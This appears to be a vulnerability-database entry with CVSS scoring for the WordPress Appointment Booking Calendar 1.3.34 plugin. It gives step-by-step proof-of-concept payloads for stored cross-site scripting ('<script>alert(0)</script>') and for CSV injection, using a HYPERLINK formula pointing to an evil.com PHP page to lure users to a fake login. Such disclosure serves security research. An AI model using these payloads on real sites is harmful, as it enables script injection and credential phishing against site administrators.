6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
5.9 Medium
AI Score
Confidence
High
0.011 Low
EPSS
Percentile
84.6%
# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372
----Stored Cross-Site-Scripting-------------------
1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click in any of the other tabs
----CSV injection---------------------------------
1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out)
2) Then we go to the page and introduce data, and the payload:
New booking:
Name: IMPORTANT DATA
Description: http://evil.com/evil.php
New booking:
Name: test
Description: =HYPERLINK(K2;H2)
This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
3) Then we go to Bookings List and export the CSV file
4) After that we open the file, and import data from an external file, using comma as separator
5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
5.9 Medium
AI Score
Confidence
High
0.011 Low
EPSS
Percentile
84.6%